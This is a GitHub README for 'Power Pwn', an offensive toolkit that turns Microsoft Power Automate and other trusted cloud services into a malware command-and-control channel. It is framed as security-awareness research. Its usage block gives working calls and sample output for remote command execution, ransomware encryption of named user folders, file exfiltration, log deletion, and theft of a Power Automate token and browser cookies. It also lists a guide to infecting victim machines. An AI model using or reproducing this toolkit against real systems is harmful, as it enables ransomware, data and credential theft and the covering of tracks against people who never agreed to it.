GitHub - ikpehlivan/power-pwn: A demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation

Power Pwn


Power Pwn is a demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.


Disclaimer: these materials are presented from an attacker's perspective with the goal of raising awareness of the risks of underestimating the security impact of No Code/Low Code. No Code/Low Code is awesome.

Usage

```python
from powerpwn.c2 import PowerPwnC2

POST_URL = ""
pp = PowerPwnC2(post_url=POST_URL)

### code execution

# python2
pp.exec_py2("print('hello world')").cmd_code_execution
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
pp.exec_py2("bad syntax").cmd_code_execution
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell
pp.exec_ps("Write-Host \"hello word\"").cmd_code_execution

# commandline
pp.exec_cmd("echo \"hello word\"").cmd_code_execution
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=True, FileContents='asd')
pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

pp.cleanup().cmd_cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

pp.steal_power_automate_token().cmd_steal_power_automate_token
# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie

pp.steal_cookie("https://www.google.com").cmd_steal_cookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')
```

How To

How to set up your Power Pwn cloud environment

How to infect a victim machine

How to troubleshoot execution errors
